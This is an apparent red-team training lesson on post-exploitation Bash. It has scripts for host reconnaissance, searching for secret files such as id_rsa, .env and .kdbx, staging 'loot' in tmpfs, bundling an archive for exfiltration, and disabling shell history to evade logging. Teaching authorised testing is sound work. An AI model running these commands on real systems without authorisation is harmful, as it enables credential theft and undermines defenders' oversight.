
Bash for red team operations


On a compromised Linux host (in an authorised engagement), Bash is already there — no uploads, no dependencies. That makes it the natural language for situational awareness, data collection, and staging. This lesson covers operational Bash, including the opsec awareness that real operations demand.

You'll learn to

  • Gather situational awareness fast
  • Collect and stage data with native tools
  • Apply basic operational security awareness

Situational awareness in one pass

# Native, dependency-free recon of a foothold:
id; hostname; uname -a                        # who and where
ip a 2>/dev/null || ifconfig                  # network interfaces
ss -tlnp 2>/dev/null || netstat -tlnp         # listening TCP services (add -u for UDP)
ps aux --sort=-%cpu | head                    # running processes, busiest first
awk -F: '$7 !~ /(nologin|false)$/' /etc/passwd   # accounts with a real login shell
sudo -n -l 2>/dev/null                        # sudo rights; -n never prompts, but the attempt is logged

The first thing on any foothold is orientation: who you are, what the box is, what's running, what you can reach. All native tools, nothing uploaded, so nothing new lands on disk. That does not make the pass silent, though. In an interactive shell every command you type is appended to ~/.bash_history unless HISTFILE is unset, and sudo -n -l is recorded in the auth log (auth.log or the journal) whether or not it succeeds, so run the sudo probe deliberately rather than by reflex.
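The same pass as a script, added here as an example and not part of the original lesson. It collects the orientation data into one report rather than scattering it across the terminal, keeps the session out of shell history, and makes the sudo probe opt-in because it is the one line that writes to the auth log. The function names (interactive_users, listening_sockets, sudo_rights, recon_report) are this example's own; interactive_users takes the passwd file as an argument so it can be exercised on a constructed sample.

```shell
#!/usr/bin/env bash
# Added example: one-pass situational awareness with basic opsec hygiene.
# Helper names are invented for this example, not from the lesson.

# Keep this session out of ~/.bash_history. This hides commands from the
# history file only; auditd, EDR and process accounting still see every exec.
export HISTFILE=/dev/null
if [ -n "${BASH_VERSION:-}" ]; then set +o history; fi

# Accounts whose login shell is not nologin/false. The passwd path is an
# argument so the parser can be tested on a sample file.
interactive_users() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $7 }' "${1:-/etc/passwd}"
}

# Listening TCP sockets; ss is preferred because netstat is often absent.
listening_sockets() {
    if command -v ss >/dev/null 2>&1; then
        ss -tlnp 2>/dev/null
    else
        netstat -tlnp 2>/dev/null
    fi
}

# sudo rights, only when explicitly requested: even a failed `sudo -n -l`
# is written to the auth log, so it is the loudest line in the pass.
sudo_rights() {
    [ "${1:-no}" = "yes" ] || { echo "(skipped: sudo probe is logged)"; return 0; }
    sudo -n -l 2>/dev/null || echo "(no passwordless sudo)"
}

# Build the whole report in one shot; print it or redirect it to tmpfs.
recon_report() {
    local probe_sudo="${1:-no}"
    {
        echo "== identity ==";   id; hostname; uname -a
        echo "== interfaces =="; ip -brief a 2>/dev/null || ifconfig 2>/dev/null
        echo "== listening ==";  listening_sockets
        echo "== processes =="; ps aux --sort=-%cpu 2>/dev/null | head -n 10
        echo "== users ==";      interactive_users /etc/passwd
        echo "== sudo ==";       sudo_rights "$probe_sudo"
    } 2>&1
}

# Usage:  recon_report        # quiet pass, sudo probe skipped
#         recon_report yes    # include the sudo check, accepting the log entry
```

Redirect the report to a tmpfs path rather than leaving it on screen if you need to come back to it; the point of building it in one function is that the collection step is a single, reviewable unit you can trim before running it on a monitored host.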

Collection and staging

# Find candidate files (read-only; nothing is modified). find / walks the whole
# filesystem, which is slow and noisy; narrow the start directory when you can:
find / -type f \( -name "*.env" -o -name "id_rsa" -o -name "*.kdbx" \) 2>/dev/null

# Stage to memory (tmpfs) rather than disk where possible, in a directory only you can read:
mkdir -p -m 700 /dev/shm/.cache && cp target_file /dev/shm/.cache/

# Bundle for exfil, writing the archive outside the directory being archived
# (an archive created inside its own source tree makes tar try to pack itself):
tar czf /dev/shm/loot.tgz -C /dev/shm/.cache . 2>/dev/null

Collection is find-plus-copy, but where you stage matters: /dev/shm is memory-backed (tmpfs), so staging there avoids writing to disk and the staging area disappears on reboot. Two caveats. /dev/shm is world-writable (mode 1777), so create your directory with mode 700 or every local user can read the loot. And tmpfs pages can be swapped out on a host with swap enabled, so "in memory" is not a guarantee against later forensic recovery. The principle is to minimise the footprint you leave.
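The staging step as a set of small functions, added here as an example rather than code from the lesson. It checks that the staging base really is tmpfs, creates the directory with mode 700 so other local users cannot read it, and writes the archive outside the directory it bundles. The base directory is a parameter so the same functions work against a scratch directory on a test box; the names (is_tmpfs, stage_dir, stage_file, bundle) are this example's own.

```shell
#!/usr/bin/env bash
# Added example: stage files into a private tmpfs directory and bundle them.
# Function names are invented for this example, not from the lesson.

# Return 0 if the path sits on a tmpfs (memory-backed) filesystem.
is_tmpfs() {
    [ "$(stat -f -c %T "$1" 2>/dev/null)" = "tmpfs" ]
}

# Create the staging directory with mode 0700 under the given base.
# /dev/shm itself is 1777, so without the 0700 any local user can read the loot.
stage_dir() {
    local base="${1:-/dev/shm}" dir
    dir="$base/.cache"
    mkdir -p -m 700 "$dir" || return 1
    chmod 700 "$dir"        # mkdir -p leaves an existing directory's mode alone
    printf '%s\n' "$dir"
}

# Copy one readable file into the staging directory and keep it private.
stage_file() {
    local dir="$1" src="$2"
    [ -r "$src" ] || return 1
    cp -- "$src" "$dir/" && chmod 600 "$dir/$(basename -- "$src")"
}

# Bundle the staging directory into an archive written OUTSIDE that directory;
# an archive created inside its own source tree makes tar try to pack itself.
bundle() {
    local dir="$1" out="$2"
    tar czf "$out" -C "$dir" . 2>/dev/null && chmod 600 "$out"
}

# Usage on a real host (not run here):
#   d=$(stage_dir /dev/shm) || exit 1
#   is_tmpfs "$d" || echo "warning: staging area is not memory-backed"
#   stage_file "$d" /home/alice/.env && bundle "$d" /dev/shm/loot.tgz
```

is_tmpfs is worth keeping separate: some hardened images mount /dev/shm noexec or replace it entirely, and on a container /dev/shm may be a small bind mount from the host, so confirming the filesystem type before copying is cheaper than discovering afterwards that the loot went to disk.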

Checkpoint

Why do red teamers favour Bash and native commands for post-exploitation, and what is the tradeoff?

Try it yourself

Write a short situational-awareness script that gathers identity, network interfaces, listening services, and sudo rights — all with native commands. Run it on a system you control. Then reflect on which of those commands a defender would most likely alert on, and how you’d reduce the noise.

Key takeaways

  • Bash is native to every Linux host — ideal for living-off-the-land.
  • Orient first: identity, network, services, processes, sudo rights.
  • Stage to memory (/dev/shm) to minimise disk footprint.
  • Every command is also a detection point — quiet often beats thorough.

Next, advanced Bash — the pipes, process substitution, and job control that make complex one-liners possible.
